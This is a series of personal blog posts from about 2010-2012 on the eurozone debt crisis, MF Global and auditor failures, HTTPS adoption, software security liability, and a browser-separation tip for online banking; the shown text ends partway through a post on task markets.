    So, we come to the the really difficult question: what to do about it? CBs don't know, so they will definately keep the stony face up because their natural reaction to any question is silence.

    But wait! you should be saying. What about the Euro?

    Well, it is true that the Europeans did indeed successfully manage to re-invent the art and issue a new currency. But, did they really know what they were doing? I would put it to you that the Euro is the exception that proves the rule. They may have issued a currency very well, but they failed spectacularly in integrating that currency into the economy.

    Which brings us full circle back to the movie now showing on media tonight and every night: GFC-2.

    Posted by iang at 06:54 PM | Comments (1) | TrackBack

    January 08, 2012

    Why we got GFC-2

    And so it came to pass that, after my aggressive little note on GFC-1's causes found in securitization (I, II, III, IV), I am asked to describe the current, all new with extra whitening Global Financial Crisis - the Remix, or GFC-2 to those who love acronyms and the pleasing rhyme of sequels.

    Or, the 2nd Great Depression, depending on how it pans out. Others have done it better than I, but here is my summary.

    Part 1. In 2000, European countries joined together in the EMU or European Monetary Union. A side-benefit of this was the Bundesbank's legendary and robust control of inflation and stiff conservative attitude to matters monetary. Which meant other countries more or less got to borrow at Bundesbank's rates, plus a few BPs (that's basis points, or hundredths of percentage points for you and I).

    Imagine that?! Italy, who had been perpetually broke under the old Lira, could now borrow at not 6 or 7% but something like 3%. Of course, she packed her credit card and went to town, as 3% on the CC meant she could buy twice as much stuff, for the same regular monthly payments. So did Ireland, Portugal, Greece and Spain. Everyone in the EMU, really.

    The problem was, they still had to pay it back. Half the interest with the same serviceable monthly credit card bill means you can borrow twice as much. Leverage! It also means that if the rates move against you, you're in it twice as deep.

    And the rates, they did surely move. For this we can blame GFC-1 which put the heebie-jeebies into the market and caused them to re-evaluate the situation. And, lo and behold, the European Monetary Union was revealed as no more than a party trick because Greece was still Greece, banks were still banks, debt was still debt, and the implicit backing from the Bundesbank was ... not actually there! Or the ECB, which by charter isn't allowed to lend to governments nor back up their foolish use of the credit card.

    Bang! Rates moves up to the old 6 or 7%, and Greece was bankrupt.

    Now we get to Part 2. It would have been fine if it had stopped there, because Greece could just default. But the debt was held by (owed to) ... the banks. Greece bankrupt ==> banks bankrupt. Not just or not even the Greek ones but all of them: as financing governments is world-wide business, and the balance sheets of the banks post-GFC-1 and in a non-rising market are anything but 'balanced.' Consider this as Part 0.

    Now stir in a few more languages, a little contagion, and we're talking *everyone*. To a good degree of approximation, if Greece defaults, USA's banking system goes nose deep in it too.

    So we move from the countries, now the least of our problems because they can simply default ... to the banks. Or, more holistically, the entire banking system. Is bankrupt.

    In its current today form, there is the knowledge that the banks cannot deal with the least hiccup. Every bank knows this, knows that if another bank defaults on a big loan, they're in trouble. So every bank pulls its punches, liquidity dries up, and credit stops flowing ... to businesses, and the economy hits a brick wall. Internationally.

    In other words, the problem isn't that countries are bankrupt, it is that they are not allowed to go bankrupt (clues 1, 2).

    We saw something similar in the Asian Financial Crisis, where countries were forced to accept IMF loans ... which paid out the banks. Once the banks had got their loans paid off, they walked, and the countries failed (because of course they couldn't pay back the loans). Problem solved.

    This time however there is no IMF, no external saviour for the banking system, because we are it, and we are already bankrupt.

    Well, there. This is as short as I can get the essentials. We need scholars like Kevin Dowd or John Maynard Keynes, those whos writing is so clear and precise as to be intellectual wonders in their own lifetimes. And, they will emerge in time to better lay down the story - the next 20 years are going to be a new halcyon age of economics. So much to study, so much new raw data. Pity they'll all be starving.

    Posted by iang at 07:12 AM | Comments (2) | TrackBack

    November 28, 2011

    Audit redux.2 - and what happened to the missing MF Global client funds?

    As we all know by now, MF Global crashed with some many billions of losses, filing for bankrupcy on 31st October. James Turk wonders aloud:

    First of all investors should be concerned because everything is so inter-connected today. People call it contagion and this contagion is real because the MF Global bankruptcy is going to have a knock on effect, just like Lehman Brothers had a knock on effect.”

    The point being that we know there is a big collapse coming, but we don't know what it will that will trigger it. James is making the broad point that a firm collapsing on the west side of the Atlantic could cause collapse in Europe. But wait, there's more:

    So the contagion is the first reason for concern. The second reason for concern is it’s taking so long for them to find this so called missing money, which I find shocking. It’s been three weeks now since the MF Global bankruptcy was declared and they started talking about $600 million of missing funds.

    So I’m not too surprised that now they are talking about $1.2 billion of missing customer funds. I think they are just trying to delay the inevitable as to how bad the situation at MF Global really is.

    And more! Chris points to an article by Bloomberg / Jonathan Weil:

    This week the trustee for the liquidation of its U.S. brokerage unit said as much as $1.2 billion of customer money is missing, maybe more. Those deposits should have been kept segregated from the company’s funds. By all indications, they weren’t.

    Jonathan zeroes in on the heart of the matter:

    Six months ago the accounting firm PricewaterhouseCoopers LLP said MF Global Holdings Ltd. and its units “maintained, in all material respects, effective internal control over financial reporting as of March 31, 2011.” A lot of people who relied on that opinion lost a ton of money.

    So when I asked:

    Let's check the record: did any audit since Sarbanes-Oxley pick up any of the problems seen in the last 18 months to do with the financial crisis?

    we now know that PricewaterhouseCoopers LLP will not be stepping up to the podium with MF Global! Jonathan echoes some of the questions I asked:

    What’s the point of having auditors do reports like this? And are they worth the cost? It’s getting harder to answer those questions in a way the accounting profession would favor.

    But now that we have a more cohesive case study to pick through, some clues are emerging:

    “Their books are a disaster,” Scott O’Malia, a commissioner at the Commodity Futures Trading Commission, told the Wall Street Journal in an interview two weeks ago. The newspaper also quoted Thomas Peterffy, CEO of Interactive Brokers Group Inc., saying: “I always knew the records were in shambles, but I didn’t know to what extent.” Interactive Brokers backed out of a potential deal to buy MF last month after finding discrepancies in its financial reports.

    That's a tough start for PricewaterhouseCoopers LLP. Then:

    For fiscal 2007, MF Global paid Pricewaterhouse $17.1 million in audit fees. By fiscal 2011, that had fallen to $10.9 million, even as warning signs about MF’s internal controls were surfacing publicly.

    In 2007, MF and one of its executives paid a combined $77 million to settle CFTC allegations of mishandling hedge-fund clients’ accounts, as well as supervisory and record-keeping violations. In 2009, the commission fined MF $10 million for four instances of risk-supervision failures, including one that resulted in $141 million of trading losses on wheat futures. Suffice it to say, Pricewaterhouse should have been on high alert.

    On top of that, Pricewaterhouse’s main regulator, the Public Company Accounting Oversight Board, released a nasty report this week on the firm’s audit performance. The agency cited deficiencies in 28 audits, out of 75 that it inspected last year. The tally included 13 clients where the board said the firm had botched its internal-control audits. The report didn’t name the companies. One of them could have been MF, for all we know.

    In a response letter to the board, Pricewaterhouse’s U.S. chairman, Bob Moritz, and the head of its U.S. audit practice, Tim Ryan, said the firm is taking steps to improve its audit quality.

    Ha! Jonathan asks the pointed question:

    The point of having a report by an independent auditor is to assure the public that what a company says is true. Yet if the reports aren’t reliable, they’re worse than worthless, because they sucker the public with false promises. Maybe, just maybe, we should stop requiring them altogether.

    Exactly. This was what I was laying out for the reader in my Audit cycle. But I was doing it from observation and logic, not from knowing about any particular episode. One however was expected to follow from the other...

    The Audit brand depletes. Certainly time to start asking hard questions. Is there value in using a big 4 auditor? Could a firm get by on a more local operation? Are there better ways?

    And, what does a big N auditor do in the new world? Well, here's one suggestion: take the bull by the horns and start laying out the truth! KPMG's new Chairman seems to be keen to add on to last week's revelation with some more:

    KPMG International LLP’s global chairman, Michael Andrew, said fraud was evident at Olympus Corp. (7733) and his firm met all legal obligations to pass on information related to Olympus’s 2008 acquisition of Gyrus Group Ltd. before it was replaced as the camera maker’s auditor.

    “We were displaced as a result of doing our job,” Andrew told reporters at the Foreign Correspondents’ Club in Hong Kong today. “It’s pretty evident to me there was very, very significant fraud and that a number of parties had been complicit.”

    Now, if I was a big N auditor, that's exactly what I'd do. Break the cone of silence and start revealing the dirt. We can't possibly make things any worse for audit, so let's shake things up. Go, Andrew.

    Posted by iang at 03:51 PM | Comments (1) | TrackBack

    October 23, 2011

    HTTPS everywhere: Google, we salute you!

    Google radically expanded Tuesday its use of bank-level security that prevents Wi-Fi hackers and rogue ISPs from spying on your searches.

    Starting Tuesday, logged-in Google users searching from Google’s homepage will be using https://google.com, not http://google.com — even if they simply type google.com into their browsers. The change to encrypted search will happen over several weeks, the company said in a blog post Tuesday.


    We have known for a long time that the answer to web insecurity is this: There is only one mode, and it is secure.

    (I use the royal we here!)

    This is evident in breaches led by phishing, as the users can't see the difference between HTTP and HTTPS. The only solution at several levels is to get rid of HTTP. Entirely!

    Simply put, we need SSL everywhere.

    Google are seemingly the only big corporate that have understood and taken this message to heart.

    Google has been a leader in adding SSL support to cloud services. Gmail is now encrypted by default, as is the company’s new social network, Google+. Facebook and Microsoft’s Hotmail make SSL an option a user must choose, while Yahoo Mail has no encryption option, beyond its intial sign-in screen.

    EFF and CAcert are small organisations that are doing it as and when we can... Together, security-conscious organisations are slowly migrating all their sites to SSL and HTTPS all the time.

    It will probably take a decade. Might as well start now -- where's your organisation's commitment to security? Amazon, Twitter, Yahoo? Facebook!

    Posted by iang at 05:24 AM | Comments (2) | TrackBack

    August 17, 2011

    How Liability is going to kill what little is left of Internet security…

    Long term readers will know that I have often written of the failure of the browser vendors to provide effective security against phishing. I long ago predicted that nothing will change until the class-action lawsuit came. Now signs are appearing that this is coming to pass:

    That's changing rapidly. Recently, Sony faced a class action lawsuit for losing the private information of millions of users. And this week, it was reported that Dropbox is already being sued for a recent security breach of its own.

    It's too early to know if these particular lawsuits will get anywhere, but they're part of a growing trend. As online services become an ever more important part of the American economy, the companies that create them increasingly find that security problems are hitting them where it really hurts: the bottom line.

    See also the spate of lawsuits against banks over losses; although it isn't the banks' direct fault, they are complicit in pushing weak security models, and a law will come to make them completely liable. Speaking of laws:

    Computer security has also been an area of increasing activity for the Federal Trade Commission. In mid-June, FTC commissioner Edith Ramirez testified to Congress about her agency's efforts to get companies to beef up their online security. In addition to enforcing specific rules for the financial industry, the FTC has asserted authority over any company that makes "false or misleading data security claims" or causes harm to consumers by failing to take "reasonable security measures." Ramirez described two recent settlements with companies whose security vulnerabilities had allowed hackers to obtain sensitive customer data. Among other remedies, those firms have agreed to submit to independent security audits for the next 20 years.

    Skip over the sad joke at the end. Timothy B. Lee and Ars Technica, author of those words, did more than just recycle other stories, they actually did some digging:

    Alex Halderman, a computer science professor at the University of Michigan, to help us evaluate these options. He argued that consumer choice by itself is unlikely to produce secure software. Most consumers aren't equipped to tell whether a company's security claims are "snake oil or actually have some meat behind them." Security problems therefore tend not to become evident until it's too late.

    But he argued the most obvious regulatory approach—direct government regulation of software security practices—was also unlikely to work. A federal agency like the FTC has neither the expertise nor the manpower to thoroughly audit the software of thousands of private companies. Moreover, "we don't have really widely regarded, well-established best practices," Halderman said. "Especially from the outside, it's difficult to look at a problem and determine whether it was truly negligent or just the kind of natural errors that happen in every software project."

    And when an agency found flaws, he said, it would have trouble figuring out how urgent they were. Private companies might be forced to spend a lot of time fixing trivial flaws while more serious problems get overlooked.

    (Buyers don't know. Sellers don't know.)

    So what about liability? I like others have recognised that liability will eventually arise:

    This is a key advantage of using liability as the centerpiece of security policy. By making companies financially responsible for the actual harms caused by security failures, lawsuits give management a strong motivation to take security seriously without requiring the government to directly measure and penalize security problems. Sony allegedly laid off security personnel ahead of this year's attacks. Presumably it thought this would be a cost-saving move; a big class action lawsuit could ensure that other companies don't repeat that mistake in future.

    But:

    Still, Halderman warned that too much litigation could cause companies to become excessively security-conscious. Software developers always face a trade-off between security and other priorities like cost and time to market. Forcing companies to devote too much effort to security can be as harmful as devoting too little. So policymakers shouldn't focus exclusively on liability, he said.

    Actually, it's far worse. Figure out some problem, and go to a company and mention that this issue exists. The company will ignore you. Mention liability, and the company will immediately close ranks and deny-by-silence any potential liability. Here's a variation written up close by concerning privacy laws:

    ...For everything else, the only rule for companies is just “don’t lie about what you’re doing with data.”

    The Federal Trade Commission enforces this prohibition, and does a pretty good job with this limited authority, but risk-averse lawyers have figured out that the best way to not violate this rule is to not make explicit privacy promises at all. For this reason, corporate privacy policies tend to be legalistic and vague, reserving rights to use, sell, or share your information while not really describing the company’s practices. Consumers who want to find out what’s happening to their information often cannot, since current law actually incentivizes companies not to make concrete disclosures.

    Likewise with liability: if it is known of beforehand, it is far easier to slap on a claim of gross negligence. Which means in simple layman's terms: triple damages. Hence, companies have a powerful incentive to ignore liability completely. As above with privacy: companies are incentivised not to do it; and so it comes to pass with security in general.

    Try it. Figure out some user-killer problem in some sector, and go talk to your favourite vendor. Mention damages, liability, etc, and up go the shutters. No word, no response, no acknowledgement. And so, the problem(s) will never get fixed. The fear of liabilities is greater than the fear of users, competitors, change, even fear itself.

    Which pretty much guarantees a class-action lawsuit one day. And the problem still won't be fixed, as all thoughts are turned to denial.

    So what to do? Halderman drifts in the same direction as I've commented:

    Halderman argued that secure software tends to come from companies that have a culture of taking security seriously. But it's hard to mandate, or even to measure, "security consciousness" from outside a company. A regulatory agency can force a company to go through the motions of beefing up its security, but it's not likely to be effective unless management's heart is in it.

    It's completely meaningless to mandate, which is the flaw behind the joke of audit. But it is possible to measure. Here's an attempt by yours truly.

    What's not clear as yet is how is it possible to incentivise companies to pursue that lofty goal, even if we all agree it is good?

    Posted by iang at 11:21 AM | Comments (1) | TrackBack

    March 30, 2011

    Revising Top Tip #2 - Use another browser!

    It's been a long time since I wrote up my Security Top Tips, and things have changed a bit since then. Here's an update. (You can see the top tips about half way down on the right menu block of the front page.)

    Since then, browsing threats have got a fair bit worse. Although browsers have done some work to improve things, their overall efforts have not really resulted in any impact on the threats. Worse, we are now seeing MITBs being experimented with, and many more attackers get in on the act.

    To cope with this heightened risk to our personal node, I experimented a lot with using private browsing, cache clearing, separate accounts and so forth, and finally hit on a fairly easy method: Use another browser.

    That is, use something other than the browser that one uses for browsing. I use Firefox for general stuff, and for a long time I've been worried that it doesn't really do enough in the battle for my user security. Safari is also loaded on my machine (thanks to Top Tip #1). I don't really like using it, as its interface is a little bit weaker than Firefox (especially the SSL visibility) ... but in this role it does very well.

    So for some time now, for all my online banking and similar usage, I have been using Safari. These are my actions:

    • I start Safari up
    • click on Safari / Private Browsing
    • use google or memory to find the bank
    • inspect the URL and head in.
    • After my banking session I shut down Safari.

    I don't use bookmarks, because that's an easy place for an trojan to look (I'm not entirely sure of that technique but it seems like an obvious hint).

    "Use another browser" creates an ideal barrier between a browsing browser and a security browser, and Safari works pretty well in that role. It's like an air gap, or an app gap, if you like. If you are on Microsoft, you could do the same thing using IE and Firefox, or you could download Chrome.

    I've also tested it on my family ... and it is by far the easiest thing to tell them. They get it! Assume your browsing habits are risky, and don't infect your banking. This works well because my family share their computers with kids, and the kids have all been instructed not to use Safari. They get it too! They don't follow the logic, but they do follow the tool name.

    What says the popular vote? Try it and let me know. I'd be interested to hear of any cross-browser threats, as well :)


    A couple of footnotes: Firsly, belated apologies to anyone who's been tricked by the old Top Tip for taking so long to write this one up. Secondly, I've dropped the Petnames / Trustbar Top Tip because it isn't really suitable for the mass users (e.g., my mother) and these fine security tools never really attracted the attention of the browser-powers-that-be, so they died away as hobby efforts tend to do. Maybe the replacement would be "Turn on Private Browsing?"

    Posted by iang at 01:54 AM | Comments (8) | TrackBack

    January 28, 2011

    The Zippo Lighter theory of the financial crisis (or, who do we want to blame?)

    The Economist summarises who the Financial Crisis Inquiry Commission of USA's Congress would like to blame in three tranches. For the Democrats, it's the financial industry and the de-regulation-mad Republicans:

    The main report, endorsed by the Democrats, points to a broad swathe of failures but pins much of the blame on the financial industry, be it greed and sloppy risk management at banks, the predations of mortgage brokers, the spinelessness of ratings agencies or the explosive growth of securitisation and credit-default swaps. To the extent that politicians are to blame, it is for overseeing a quarter-century of deregulation that allowed Wall Street to run riot.

    For the Republicans:

    A dissenting report written by three of the Republicans could be characterised as the Murder on the Orient Express verdict: they all did it. Politicians, regulators, bankers and homebuyers alike grew too relaxed about leverage, helping to create a perfect financial storm. This version stresses broad economic dynamics, placing less emphasis on Wall Street villainy and deregulation than the main report does.

    Finally, one lone dissenter:

    A firmer (and, at 43,000 words, longer) rebuttal of the report by the fourth Republican, Peter Wallison, puts the blame squarely on government policies aimed at increasing home ownership among the poor. Mr Wallison argues that the pursuit of affordable-housing goals by government and quasi-government agencies, including Fannie Mae and Freddie Mac, caused a drastic decline in loan-underwriting standards. Over 19m of the 27m subprime and other risky mortgages created in the years leading up to the crisis were bought or guaranteed by these agencies, he reckons. These were "not a cigarette butt being dropped in a tinder-dry forest" but "a gasoline truck exploding" in the middle of one, Mr Wallison says.

    Yessss..... That's getting closer. Not exactly a gasoline truck, as that would have one unfortunate spark. More like several containers, loaded with 19m fully-loaded zippo lighters driven into the forest of housing finance one hot dry summer, and distributed to as many needy dwellers as could be found.

    Now, who would have driven that truck, and why? Who would have proposed it to the politicians? Ask these questions, and we're almost there.

    Posted by iang at 05:39 AM | Comments (3) | TrackBack

    November 21, 2010

    What banking is. (Essential for predicting the end of finance as we know it.)

    To understand what's happening today in the economy, we have to understand what banking is, and by that, I mean really understand how it works.

    This time it's personal, right? Let's starts with what Niall Ferguson says about banking:

    To understand why we have come so close to a rerun of the 1930s, we need to begin at the beginning, with banks and the money they make. From the Middle Ages until the mid-20th century, most banks made their money by maximizing the difference between the costs of their liabilities (payments to depositors) and the earnings on their assets (interest and commissions on loans). Some banks also made money by financing trade, discounting the commercial bills issued by merchants. Others issued and traded bonds and stocks, or dealt in commodities (especially precious metals). But the core business of banking was simple. It consisted, as the third Lord Rothschild pithily put it, "essentially of facilitating the movement of money from Point A, where it is, to Point B, where it is needed."

    As much as the good Prof's comments are good and fruitful, we need more. Here's what banking really is:

    Banking is borrowing from the public on demand, and lending those demand deposits to the public at term.

    Sounds simple, right? No, it's not. Every one of those words is critically important, and change one or two of them and we've broken it. Let's walk it through:

    Banking is borrowing from the public ..., and lending ... to the public.

    Both from the public, and to the public. The public at both ends of banking is essential to ensure a diversification effect (A to B), a facilitation effect (bank as intermediary), and ultimately a public policy interest in regulation (the central bank). If one of those conditions aren't met, if one of those parties aren't "the public", then: it's not banking. For example,

    • a building society or Savings & Loan is not doing banking, because .. it borrows from *members* who are by normal custom allowed to band together and do what they like with their money.
    • a mutual fund is not banking because the lenders are sophisticated individuals, and the borrowers are generally sophisticated as well.
    • Likewise, an investment bank does not deal with the public at all. So it's not banking. By this theory, it's really a financial investment house for savvy players (tell that to Deutschebank when it's chasing Goldman-Sachs for a missing billion...).

    So now we can see that there is actually a reason why the Central Banks are concerned about banks, but less so about funds, S&Ls, etc. Back to the definition:

    Banking is borrowing ... on demand, and lending those demand deposits ... at term.

    On demand means you walk into the bank and get your money back. Sounds quite reasonable. At term means you don't. You have to wait until the term expires. Then you get your money back. Hopefully.

    The bank has a demand obligation to the public lender, and a (long) term promise from the public borrower. This is quaintly called a maturity mismatch in the trade. What's with that?

    The bank is stuck between a rock and a hard place. Let's put more meat on these bones: if the bank borrows today, on demand, and lends that out at term, then in the future, it is totally dependent on the economy being kind to the people owing the money. That's called risk, and for that, banks make money.

    This might sound a bit dry, but Mervyn King, the Governor of the Bank of England, also recently took time to say it in even more dry terms (as spotted by Hasan):

    3. The theory of banking

    Why are banks so risky? The starting point is that banks make heavy use of short-term debt. Short-term debt holders can always run if they start to have doubts about an institution. Equity holders and long-term debt holders cannot cut and run so easily. Douglas Diamond and Philip Dybvig showed nearly thirty years ago that this can create fragile institutions even in the absence of risk associated with the assets that a bank holds. All that is required is a cost to the liquidation of long-term assets and that banks serve customers on a first-come, first-served basis (Diamond and Dybvig, 1983).

    This is not ordinary risk. For various important reasons, banking risk is extraordinary risk, because no bank, no matter where we are talking, can deal with unexpected risks that shift the economy against it. Which risks manifest themselves with an increase in defaults, that is, when the long term money doesn't come back at all.

    Another view on this same problem is when the lending public perceive a problem, and decide to get their money out. That's called a run; no bank can deal with unexpected shifts in public perception, and all the lending public know this, so they run to get the money out. Which isn't there, because it is all lent out.

    (If this is today, and you're in Ireland, read quietly...)

    A third view on this is the legal definition of fraud: making deceptive statements, by entering into contracts that you know you cannot meet, with an intent to make a profit. By this view, a bank enters into a fraudulent contract with the demand depositor, because the bank knows (as does everyone else) that the bank cannot meet the demand contract for everyone, only for around 1-2% of the depositors.

    Historically, however, banking was very valuable. Recall Mr Rothschild's goal of "facilitating the movement of money from Point A, where it is, to Point B, where it is needed." It was necessary for society because we simply had no other efficient way of getting small savings from the left to large and small projects on the right. Banking was essential for the rise of modern civilisation, or so suggests Mervyn King, in an earlier speech:

    Writing in 1826, under the pseudonym of Malachi Malagrowther, [Sir Walter Scott] observed that:
    "Not only did the Banks dispersed throughout Scotland afford the means of bringing the country to an unexpected and almost marvellous degree of prosperity, but in no considerable instance, save one [the Ayr Bank], have their own over-speculating undertakings been the means of interrupting that prosperity".

    Banking developed for a fairly long period, but as a matter of historical fact, it eventually settled on a structure known as central banking [1]. It's also worth mentioning that this historical development of central banking is the history of the Bank of England, and the Governor is therefore the custodian of that evolution.

    Then, the Central Bank was the /lender of last resort/ who would stop the run.

    Nevertheless, there are benefits to this maturity transformation - funds can be pooled allowing a greater proportion to be directed to long-term illiquid investments, and less held back to meet individual needs for liquidity. And from Diamond's and Dybvig's insights, flows an intellectual foundation for many of the policy structures that we have today - especially deposit insurance and Bagehot's time-honoured key principle of central banks acting as lender of last resort in a crisis.

    Regulation and the structure we know today therefore rest on three columns:

    1. the function of lender of last resort, which itself is exclusively required by the improbable contract of deposits being lent at term,
    2. the public responsibility of public lending and public borrowing, and
    3. the public interest in providing the prosperity for all,

    That which we know today as banking is really central banking. Later on, we find refinements such as the BIS and their capital ratio, the concept of big strong banks, national champions, coinage and issuance, interest rate targets, non-banking banking, best practices and stress testing, etc etc. All these followed in due course, often accompanied with a view of bigger, stronger, more diversified.

    Which sets half of the scene for how the global financial crisis is slowly pushing us closer to our future. The other half in a future post, but in the meantime, dwell on this: Why is Mervyn King, as the Guv of the Old Lady of Threadneedle Street (a.k.a. Bank of England), spending time teaching us all about banking?


    1. What banking is. (Essential for predicting the end of finance as we know it.)

    2. What caused the financial crisis. (Laying bare the end of banking.)

    3. A small amount of Evidence. (In which, the end of banking and the rise of markets is suggested.)

    4. Mervyn King calls us to the Old Lady's deathbed?

    [1] Slight handwaving dance here as we sidestep past Scotland, and let's head back to England. I'm being slightly innocent with the truth here, and ignoring the pointed reference to Scotland.

    Posted by iang at 07:25 AM | Comments (3) | TrackBack

    August 24, 2010

    What would the auditor say to this?

    Iran's Bushehr nuclear power plant in Bushehr Port:

    "An error is seen on a computer screen of Bushehr nuclear power plant's map in the Bushehr Port on the Persian Gulf, 1,000 kms south of Tehran, Iran on February 25, 2009. Iranian officials said the long-awaited power plant was expected to become operational last fall but its construction was plagued by several setbacks, including difficulties in procuring its remaining equipment and the necessary uranium fuel. (UPI Photo/Mohammad Kheirkhah)"

    Click onwards for full sized image:

    Compliant? Minor problem? Slight discordance? Conspiracy theory?

    (spotted by Steve Bellovin)

    Posted by iang at 05:53 AM | Comments (2) | TrackBack

    August 13, 2010

    Turning the Honeypot

    I'm reading a govt. security manual this weekend, because ... well, doesn't everyone?

    To give it some grounding, I'm building up a cross-reference against my work at the CA. I expected it to remain rather dry until the very end, but I've just tripped up on this Risk in the section on detecting incidents:

    2.5.7. An agency constructs a honeypot or honeynet to assist in capturing intrusion attempts, resulting in legal action being taken against the agency for breach of privacy.

    My-oh-my!

    Posted by iang at 08:06 PM | Comments (4) | TrackBack

    August 12, 2010

    memes in infosec II - War! Infosec is WAR!

    Another metaphor (I) that has gained popularity is that Infosec security is much like war. There are some reasons for this: there is an aggressive attacker out there who is trying to defeat you. Which tends to muck a lot of statistical error-based thinking in IT, a lot of business process, and as well, most economic models (e.g., asymmetric information assumes a simple two-party model). Another reason is the current beltway push for essential cyberwarfare divisional budget, although I'd hasten to say that this is not a good reason, just a reason. Which is to say, it's all blather, FUD, and oneupsmanship against the Chinese, same as it ever was with Eisenhower's nemesis.

    Having said that, infosec isn't like war in many ways. And knowing when and why and how is not a trivial thing. So, drawing from military writings is not without dangers. Consider these laments about applying Sun Tzu's The Art of War to infosec from Steve Tornio and Brian Martin:

    In "The Art of War," Sun Tzu's writing addressed a variety of military tactics, very few of which can truly be extrapolated into modern InfoSec practices. The parts that do apply aren't terribly groundbreaking and may actually conflict with other tenets when artificially applied to InfoSec. Rather than accept that Tzu's work is not relevant to modern day Infosec, people tend to force analogies and stretch comparisons to his work. These big leaps are professionals whoring themselves just to get in what seems like a cool reference and wise quote.

    "The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable." - The Art of War

    The Art of SunTzu is not a literal quoting and thence mad rush to build the tool. Art of War was written from the context of a successful general talking to another hopeful general on the general topic of building an army for a set piece nation-to-nation confrontation. It was also very short.

    Art of War tends to interlace high level principles with low level examples, and dance very quickly through most of its lessons. Hence it was very easy to misinterpret, and equally easy to "whore oneself for a cool & wise quote."

    However, Sun Tzu still stands tall in the face of such disrespect, as it says things like know yourself FIRST, and know the enemy SECOND, which the above essay actually agreed with. And, as if it needs to be said, knowing the enemy does not imply knowing their names, locations, genders, and proclivities:

    Do you know your enemy? If you answer 'yes' to that question, you already lost the battle and the war. If you know some of your enemies, you are well on your way to understanding why Tzu's teachings haven't been relevant to InfoSec for over two decades. Do you want to know your enemy? Fine, here you go. your enemy may be any or all of the following:

    • 12 y/o student in Ohio learning computers in middle school
    • 13 y/o home-schooled girl getting bored with social networks
    • 15 y/o kid in Brazil that joined a defacement group
    • ...

    Of course, Sun Tzu also didn't know the sordid details of every soldier's desires; "knowing" isn't biblical, it's capable. Or, knowing their capabilities, and that can be done, we call it risk management. As Jeffrey Carr said:

    The reason why you don't know how to assign or even begin to think about attribution is because you are too consumed by the minutia of your profession. ... The only reason why some (OK, many) InfoSec engineers haven't put 2+2 together is that their entire industry has been built around providing automated solutions at the microcosmic level. When that's all you've got, you're right - you'll never be able to claim victory.

    Right. Most all InfoSec engineers are hired to protect existing installations. The solution is almost always boxed into the defensive, siege mentality described above, because the alternate, as Dan Geer apparently said:

    When you are losing a game that you cannot afford to lose, change the rules. The central rule today has been to have a shield for every arrow. But you can't carry enough shields and you can run faster with fewer anyhow.

    The advanced persistent threat, which is to say the offense that enjoys a permanent advantage and is already funding its R&D out of revenue, will win as long as you try to block what he does. You have to change the rules. You have to block his success from even being possible, not exchange volleys of ever better tools designed in response to his. You have to concentrate on outcomes, you have to pre-empt, you have to be your own intelligence agency, you have to instrument your enterprise, you have to instrument your data.

    But, at a corporate level, that's simply not allowed. Great ideas, but only the achievable strategy is useful, the rest is fantasy. You can't walk into any company or government department and change the rules of infosec -- that means rebuilding the apps. You can't even get any institution to agree that their apps are insecure; or, you can get silent agreement by embarrassing them in the press, along with being fired!

    I speak from pretty good experience of building secure apps, and of looking at other institutional or enterprise apps and packages. The difference is huge. It's the difference between defeating Japan and defeating Vietnam. One was a decision of maximisation, the other of minimisation. It's the difference between engineering and marketing; one is solid physics, the other is facade, faith, FUD, bribes.

    It's the difference between setting up a world-beating sigint division, and fixing your own sigsec. The first is a science, and responds well by adding money and people. Think Manhattan, Bletchley Park. The second is a societal norm, and responds only to methods generally classed by the defenders as crimes against humanity and applications. Slavery, colonialism, discrimination, the great firewall of China, if you really believe in stopping these things, then you are heading for war with your own people.

    Which might all lead the grumpy anti-Sun Tzu crowd to say, "told you so! This war is unwinnable." Well, not quite. The trick is to decide what winning is; to impose your will on the battleground. This is indeed what strategy is, to impose ones own definition of the battleground on the enemy, and be right about it, which is partly what Dan Geer is getting at when he says "change the rules." A more nuanced view would be: to set the rules that win for you; and to make them the rules you play by.

    And, this is pretty easily answered: for a company, winning means profits. As long as your company can conduct its strategy in the face of affordable losses, then it's winning. Think credit cards, which sacrifice a few hundred basis points for the greater good. It really doesn't matter how much of a loss is made, as long as the customer pays for it and leaves a healthy profit over.

    Relevance to Sun Tzu? The parable of the Emperor's Concubines!

    In summary, it is fair to say that Sun Tzu is one of those texts that are easy to bandy around, but rather hard to interpret. Same as infosec, really, so it is no surprise we see it in that world. Also, war as a very complicated business, and Art of War was really written for that messy discipline ... so it takes somewhat more than a familiarity from both to successfully relate across beyond a simple metaphor level.

    And, as we know, metaphors and analogues are descriptive tools, not proofs. Proving them wrong proves nothing more than you're now at least an adolescent.

    Finally, even war isn't much like war these days. If one factors in the last decade, there is a clear pattern of unilateral decisions, casus belli at a price, futile targets, and effervescent gains. Indeed, infosec looks more like the low intensity, mission-shy wars in the Eastern theaters than either of them look like Sun Tzu's campaigns.

    memes in infosec I - Eve and Mallory are missing, presumed dead

    Posted by iang at 04:34 PM | Comments (1) | TrackBack

    May 19, 2010

    blasts from the past -- old predictions come true

    Some things I've seen that match predictions from a long time back, just weren't exciting enough to merit an entire blog post, but were sufficient to blow the trumpet in orchestra:

    Chris Skinner of The Finanser puts in his old post written in 1997, which says that retailers (Tesco and Sainsbury's) would make fine banks, and were angling for it. Yet:

    Thirteen years later, we talk about Tesco and Virgin breaking into UK banking again.

    A note of caution: after thirteen years, these names have not made a dent on these markets. Will they in the next thirteen years?

    Answer: in 1997, none of these brands stood a cat in hell’s chance of getting a banking licence. Today, Virgin and Tesco have banking licences.

    Exactly. As my 1996 paper on electronic money in Europe also made somewhat clear, the regulatory approach of the times was captured by the banks, for the banks, of the banks. The intention of the 1994 directive was to stop new entrants in payments, and it did that quite well. So much so that they got walloped by the inevitable (and predicted) takeover by foreign entrants such as Paypal.

    However regulators in the European Commission working groups(s) seemed not to like the result. They tried again in 2000 to open up the market, but again didn't quite realise what a barrier was, and didn't spot the clauses slipped in that killed the market. However, in 2008 they got it more right with the latest eMoney directive, which actually has a snowball's chance in hell. Banking regulations and the PSD (Payment Services Directive) also opened things up a lot, which explains why Virgin and Tesco today have their licence.

    One more iteration and this might make the sector competitive...

    Then, over on the Economist, an article on task markets

    Over the past few years a host of fast-growing firms such as Elance, oDesk and LiveOps have begun to take advantage of “the cloud”—tech-speak for the combination of ubiquitous fast internet connections and cheap, plentiful web-based computing power—to deliver sophisticated software that makes it easier to monitor and manage remote workers. Maynard Webb, the boss of LiveOps, which runs virtual call centres with an army of over 20,000 home workers in America, says the company’s revenue exceeded $125m in 2009. He is confidently expecting a sixth year of double-digit growth this year.

